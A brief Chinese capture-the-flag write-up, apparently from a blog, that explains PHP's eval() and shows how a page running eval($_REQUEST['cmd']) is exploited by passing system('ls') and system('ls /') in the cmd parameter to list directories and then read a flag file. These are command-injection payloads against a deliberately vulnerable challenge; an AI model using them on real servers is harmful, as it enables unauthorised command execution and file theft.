本文通过实例解析PHP中eval()函数的应用,展示如何利用该函数执行外部命令并找到隐藏的flag_28679,涉及目录操作和文件读取过程。
首先进入题目
我们先了解一下php当中eval()函数的作用
eval()函数中的eval是evaluate的简称,这个函数的作用就是把一段字符串当作PHP语句来执行。
比如说eval($_REQUEST["cmd"])
$_REQUEST[]是接收数据用的,而其中的cmd 就是其中的数据
进入题目
cmd是其中的参数,我们就把命令赋给cmd,我们先显示一下网页的根目录
?cmd=system("ls ");
接着我们看上一级目录
?cmd=system("ls /");
发现flag_28679
我们cat它
拿到flag
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
